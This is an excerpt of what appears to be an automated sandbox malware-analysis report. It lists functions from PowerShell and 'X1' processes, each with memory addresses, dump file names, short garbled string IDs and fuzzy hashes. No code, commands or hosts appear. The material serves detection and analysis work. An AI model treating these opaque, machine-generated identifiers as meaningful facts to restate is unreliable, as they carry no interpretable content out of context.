                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (B$I$(B$I$(B$I$(B$I$(B$I
                                                                                • API String ID: 0-3685135179
                                                                                • Opcode ID: 5f8837c772919254fdc7fa153ef601faebe1b6907e6b5865a9208d6ea5be18f9
                                                                                • Instruction ID: 276951a7c248bdfac023302b4d04021c975eaacbcda6fe2681af221a827a050b
                                                                                • Opcode Fuzzy Hash: 5f8837c772919254fdc7fa153ef601faebe1b6907e6b5865a9208d6ea5be18f9
                                                                                • Instruction Fuzzy Hash: C6B1FE31D1EA8A5FE799AB2858145B5BBE0EF19394F1802BFD50DCB0D3EE1CA804C359
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FF6515 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (B$I$(B$I$(B$I$(B$I
                                                                                • API String ID: 0-2819540369
                                                                                • Opcode ID: 6c75501edc71991407d185bb6e51900d101dd5d4f9ba9f9ecddef2166284396f
                                                                                • Instruction ID: a4354923a2d16666303f8734dc5fe53b9ba4074d5a43f84f3cee0ccaeb0626b4
                                                                                • Opcode Fuzzy Hash: 6c75501edc71991407d185bb6e51900d101dd5d4f9ba9f9ecddef2166284396f
                                                                                • Instruction Fuzzy Hash: 3351EF31E0EAC65FE799AB281450578AAE0EF1A694F1800FFC24DDB0D7EE0C9804C359
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FF4073 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8>$I
                                                                                • API String ID: 0-3301367642
                                                                                • Opcode ID: a90f06f751f71d05f862af307a9a3074becd3750b2d0b5934708246748cd4f2f
                                                                                • Instruction ID: 2093772ac164ea2546decbab895eab3df4e0a12c2a3d5beb5f3f9428e0c38df4
                                                                                • Opcode Fuzzy Hash: a90f06f751f71d05f862af307a9a3074becd3750b2d0b5934708246748cd4f2f
                                                                                • Instruction Fuzzy Hash: 7451F732A0DA4A4FE79AEB2C541167577D2FF65260F5801BBD20EC72D3DF18E8058349
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F2A73C Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263947636.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: jR_L
                                                                                • API String ID: 0-1487830661
                                                                                • Opcode ID: 373195ffc0551dfc2e9c82dad34bef7c0e0c399d41eaa67ee5baecd1f4078597
                                                                                • Instruction ID: 1c98969452982c378c27865ec156456ef461f6d90ba549aac6b57aea6859de59
                                                                                • Opcode Fuzzy Hash: 373195ffc0551dfc2e9c82dad34bef7c0e0c399d41eaa67ee5baecd1f4078597
                                                                                • Instruction Fuzzy Hash: 7951453051EBC54FE30AEB289855960BBE0EF56354B1804FED08AC71A3EA1AAC47C756
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FF4370 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p>$I
                                                                                • API String ID: 0-2590420872
                                                                                • Opcode ID: bd3134708b9508d88cde56437e5832b098b9f7f4f47ad54bf6de262e68df5a78
                                                                                • Instruction ID: c66d5833b496f83386744ad542fa19d6ddee696ef37015518a87c6327ae46bd7
                                                                                • Opcode Fuzzy Hash: bd3134708b9508d88cde56437e5832b098b9f7f4f47ad54bf6de262e68df5a78
                                                                                • Instruction Fuzzy Hash: 95412832E0DA894FE7A9EB2C64106B877E1EF55760F4801BBC65DC71C3EB18AC158395
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FF40BF Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8>$I
                                                                                • API String ID: 0-3301367642
                                                                                • Opcode ID: be43e86c6a6e8ad6ccbc3c54d5a60de4a88491d1830a0c691e4e6a888809aef0
                                                                                • Instruction ID: f60270cf8c31db9bd8dfa357f0bab316248a1efbdff6518c06e9f17f0f7be4db
                                                                                • Opcode Fuzzy Hash: be43e86c6a6e8ad6ccbc3c54d5a60de4a88491d1830a0c691e4e6a888809aef0
                                                                                • Instruction Fuzzy Hash: DD21D032E0EA874FE7AAEB18545113466D2FF602A4F5801BAD20EC72D3DF18DC058349
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FF43BC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p>$I
                                                                                • API String ID: 0-2590420872
                                                                                • Opcode ID: f76b8cfabe6f399c3b77b22677ecca973f7800efbf2d5ee610a8a4f5f721b868
                                                                                • Instruction ID: 3d85ef9544d8e18af1df074afb0ae3594b0a3ace855b1cdecafe131dfb0646f5
                                                                                • Opcode Fuzzy Hash: f76b8cfabe6f399c3b77b22677ecca973f7800efbf2d5ee610a8a4f5f721b868
                                                                                • Instruction Fuzzy Hash: 4211C232D0E58A4FE7A9EB2894545B87BE1FF20660F5800FBC61DDB1D3DB19AC149385
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F29780 Relevance: .1, Instructions: 128COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263947636.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 63b6e842f5373dda590ecefc571f46dc994ef97651b18fc8f52aed49b3d89bba
                                                                                • Instruction ID: e2776746ee58272f7644c4a673d98923fd2e53042e93d135c94e8b9ed0745c97
                                                                                • Opcode Fuzzy Hash: 63b6e842f5373dda590ecefc571f46dc994ef97651b18fc8f52aed49b3d89bba
                                                                                • Instruction Fuzzy Hash: 5231FA3191CB484FDB1C9F1CAC066A97BE0FB55711F00416FE449C3692CB75A855CBC6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848E0EB80 Relevance: .1, Instructions: 125COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263237028.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848e0d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d3783ea8a554ba1ed41b8ca36e3d5bf6b7162532e2118b4e06cd1ef100776b04
                                                                                • Instruction ID: 3927d3f116c9cc0d3d0b847fcabe86fbef0f9d4373b1f74c1ea95ce3dd5e058e
                                                                                • Opcode Fuzzy Hash: d3783ea8a554ba1ed41b8ca36e3d5bf6b7162532e2118b4e06cd1ef100776b04
                                                                                • Instruction Fuzzy Hash: E441183180DBC55FE7669B2898459623FF0FF53264F1509EFD089CB1A3E625A806CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F2AC73 Relevance: .1, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263947636.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 348c0f31d01885bb5a2f596bfcd3b72e029bff2cda4d685b0296f6a47ed6c28b
                                                                                • Instruction ID: 392b5d687373e4f5744aa8e50ff19a75fe3d884171f2e48a0e25c8895d5f4d81
                                                                                • Opcode Fuzzy Hash: 348c0f31d01885bb5a2f596bfcd3b72e029bff2cda4d685b0296f6a47ed6c28b
                                                                                • Instruction Fuzzy Hash: 0631297180D7C88FD70A8B689C995B97FB4EF53210F0841DFD084CB1A3DA295846CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FF6605 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 027b9267abf56e8bf246d2554664bda3d71cbaf52fa60a4f2f289a5029d4bd22
                                                                                • Instruction ID: df69598eadf38e7b51ad4fc2cbbf7e135e500176847a85d6aa0aea64f4107003
                                                                                • Opcode Fuzzy Hash: 027b9267abf56e8bf246d2554664bda3d71cbaf52fa60a4f2f289a5029d4bd22
                                                                                • Instruction Fuzzy Hash: DC11CE7290E7C14FE7179778585A0E8BFB0EF1B660B1900FBD088DB0A3E91D584AC326
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F233B5 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263947636.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                                                                                • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F2A0FB Relevance: .0, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263947636.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ca27cbec8f5cc72cd7a12bea8701731134007f408af0c4717c052c6406f4b2f2
                                                                                • Instruction ID: 28d844ba93ae9806bffff29f32c270164a48a96d3509c1337b480402354486e4
                                                                                • Opcode Fuzzy Hash: ca27cbec8f5cc72cd7a12bea8701731134007f408af0c4717c052c6406f4b2f2
                                                                                • Instruction Fuzzy Hash: E2F0F63691DA8C8FD746EF2CE8650E47FA0FF66252B0502EBD448C71A2DF229858C7C1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00007FF848F28BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263947636.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                                • API String ID: 0-962139525
                                                                                • Opcode ID: 63b5047cba73ab94ebcf28c082ddf486a212eb9717c7729175fddac6c1281f11
                                                                                • Instruction ID: 7fd3566e5afb083c6e6401c0847751e720ad71e5f9896b647dd2248b4652e339
                                                                                • Opcode Fuzzy Hash: 63b5047cba73ab94ebcf28c082ddf486a212eb9717c7729175fddac6c1281f11
                                                                                • Instruction Fuzzy Hash: FD21D473A29525DAD242366CB8419DD7790EF543B978603F3E028CF193EE1CA48B8A95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                Function 00007FF848FE6605 Relevance: 7.9, Strings: 6, Instructions: 436COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2445697878.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848fe0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (B"I$(B"I$(B"I$(B"I$(B"I$X7c3
                                                                                • API String ID: 0-1448240716
                                                                                • Opcode ID: ac63df185c95355e4efa33424f16d4c633c3e83d917c0af14a50f630e7692fa1
                                                                                • Instruction ID: 05e8e5761e4a549dc64260c6552d5b6670424776a223ae65e348ed61021427f5
                                                                                • Opcode Fuzzy Hash: ac63df185c95355e4efa33424f16d4c633c3e83d917c0af14a50f630e7692fa1
                                                                                • Instruction Fuzzy Hash: 5CD14131D1EA8E5FE795EB2858545B9BBE0EF16394F1801FAD04DCB0D3EA1CA805C356
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FE4073 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2445697878.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848fe0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8>"I
                                                                                • API String ID: 0-2459728092
                                                                                • Opcode ID: 7c384430dd1ff86df7532ad646dbb4606ee50626cb8d0c714fb231fe764b500f
                                                                                • Instruction ID: 99553a4fca475977e0930b3697d7a34d53fa005277275f1497b0145f16239e8b
                                                                                • Opcode Fuzzy Hash: 7c384430dd1ff86df7532ad646dbb4606ee50626cb8d0c714fb231fe764b500f
                                                                                • Instruction Fuzzy Hash: F551B332A0DE8A4FEB9AEB2C941167577D2EFA5660F5801BEC14EC71D3DF1CE8058249
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FE4370 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2445697878.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848fe0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p>"I
                                                                                • API String ID: 0-3426486286
                                                                                • Opcode ID: a5ef57388118ef6cfa84284219311b577c695e17536815f8b0235439975d268f
                                                                                • Instruction ID: 9918a36baaef5957583adc941654c71c78a907acbdb4b6ebe8dc5669fa5be49e
                                                                                • Opcode Fuzzy Hash: a5ef57388118ef6cfa84284219311b577c695e17536815f8b0235439975d268f
                                                                                • Instruction Fuzzy Hash: AD41F432E0DE894FE7A9EB2864106B877E1EF55660F4801BEC449C71C7EB1CAC158395
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FE40BF Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2445697878.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848fe0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8>"I
                                                                                • API String ID: 0-2459728092
                                                                                • Opcode ID: 46e32ee8136e8793d9535e6feea16ff5393ddbcad028dc1a0ea8f94b6a7840a4
                                                                                • Instruction ID: eb9ef0a161bc5c49652d3c860667b76a9ab3622c45b6835a88db68cf0c6932ec
                                                                                • Opcode Fuzzy Hash: 46e32ee8136e8793d9535e6feea16ff5393ddbcad028dc1a0ea8f94b6a7840a4
                                                                                • Instruction Fuzzy Hash: 73218F32D0EE864FEBA6EB18545517466D2FF64294F5901BEC11DC71D3CF1CDC058249
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FE43BC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2445697878.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848fe0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p>"I
                                                                                • API String ID: 0-3426486286
                                                                                • Opcode ID: 191b1e8714d169a833e5df18dff0779307a91dd6c7637722e1bf568332458a28
                                                                                • Instruction ID: f637192066c670f43070331b21fc7b91e91f00480133b7e993fd66e30ee6c76b
                                                                                • Opcode Fuzzy Hash: 191b1e8714d169a833e5df18dff0779307a91dd6c7637722e1bf568332458a28
                                                                                • Instruction Fuzzy Hash: 7D119E32E0EA8A4FE7A5EB2894545B87AD1FF60660F5800BAC41DCB1D3DB1CAC149395
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F19F20 Relevance: .3, Instructions: 265COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2444718019.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848f10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4d34d2988f6854f27e948636ef9c1bab066e0fd59ca2d0a681536c3c1eb564fb
                                                                                • Instruction ID: c63defdb119c7c364fb0798572521051f1a41caa8df363e273f99ab2f0691bd9
                                                                                • Opcode Fuzzy Hash: 4d34d2988f6854f27e948636ef9c1bab066e0fd59ca2d0a681536c3c1eb564fb
                                                                                • Instruction Fuzzy Hash: 5A714D37D0D9925FE316BB7CA8660E57B60EF117A9F4801B6C09C8E0D3EE181C568799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F19768 Relevance: .1, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2444718019.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848f10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dbcf3bf95ba566a4f5bbe606d295ea8fb8af5bf4350417044d6fb0a94e15c424
                                                                                • Instruction ID: de9dda4eeb7d8fff6f9cb103e4e55e4fc2b2dc73bbfac167070c5b62bfeabe4a
                                                                                • Opcode Fuzzy Hash: dbcf3bf95ba566a4f5bbe606d295ea8fb8af5bf4350417044d6fb0a94e15c424
                                                                                • Instruction Fuzzy Hash: F331F83191CB489FDB1C9F1CA8066A97BE1FBA5711F00412FE449D3692DB60A856CBC6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848DFE540 Relevance: .1, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2443638524.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848dfd000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 32c779eac662ce6be38003ae87ecc09bb2774e51ef9222628173850314933858
                                                                                • Instruction ID: 57a8e5a2b02fd14df12e288b42acc458f591d4301662ec5fe30b1e35c9431e25
                                                                                • Opcode Fuzzy Hash: 32c779eac662ce6be38003ae87ecc09bb2774e51ef9222628173850314933858
                                                                                • Instruction Fuzzy Hash: D141137080EBC44FE7569B289855A523FF0EF56320F1506DFD088CB1A3D729E84AC792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F1A47C Relevance: .1, Instructions: 103COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2444718019.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848f10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f50cdfa81bb86f92cad112473d25b536e638eaa79c972dd5183042acda5c4e1b
                                                                                • Instruction ID: 026956b3fa943b1742c4d2de1ea7c15f758817de70ad0c0731e0dd3a8b288909
                                                                                • Opcode Fuzzy Hash: f50cdfa81bb86f92cad112473d25b536e638eaa79c972dd5183042acda5c4e1b
                                                                                • Instruction Fuzzy Hash: 37212B3090CB4C8FDB59DF6C984A7E97FF0EB96321F04426BD048C3152DA749856C791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2444718019.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848f10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00007FF848F18BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2444718019.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848f10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: N_^4$N_^7$N_^F$N_^J
                                                                                • API String ID: 0-3508309026
                                                                                • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                • Instruction ID: f6facd9be01d464781fe06f2e9dfce22635aafd9ed82b64586b0b92a0b284f4c
                                                                                • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                • Instruction Fuzzy Hash: 8E213B7761A0259ED3417BBDBC145DA3750EF942B8B4502B2D298CF143EA1C708686D5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                Function 00007FF848F412E9 Relevance: 3.3, Strings: 2, Instructions: 767COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CAL_^$SAL_^
                                                                                • API String ID: 0-3741013414
                                                                                • Opcode ID: ab7a83957f84b3ccc4195cf242657a65709076993e5bdd469479ca9590b2e00a
                                                                                • Instruction ID: 368ffb1a37e232dc9550fb4ff432d633fb3aadea966ed1c65eaf6d94cf5fa0b8
                                                                                • Opcode Fuzzy Hash: ab7a83957f84b3ccc4195cf242657a65709076993e5bdd469479ca9590b2e00a
                                                                                • Instruction Fuzzy Hash: 3132BE30B2DA199FE784FB2884597B976E2FF98744F504579E40EC32C2DF2CA9818745
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F40C5E Relevance: .7, Instructions: 747COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a849248130be18498774c703f0168e87fa743ba5e6990a6f5376f92a04e85c1
                                                                                • Instruction ID: c2db4d7d85ee468f51557a510dd0c1734347d4e066876cacd1bebe51d1ef7424
                                                                                • Opcode Fuzzy Hash: 3a849248130be18498774c703f0168e87fa743ba5e6990a6f5376f92a04e85c1
                                                                                • Instruction Fuzzy Hash: FD912631A0DA9A0FE396BB3C98561F97BE1EF96250F0800BBC449D71E3DE1C68468355
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F40DF5 Relevance: .6, Instructions: 576COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 06e6ad7e2d758a7b9c7ba71086ec7e21f2a161f6823efe48cad76ac58154d535
                                                                                • Instruction ID: bab8d1071a12d1375b530885313e1ce0efd3cd6440c6f2d03296342d42eb957c
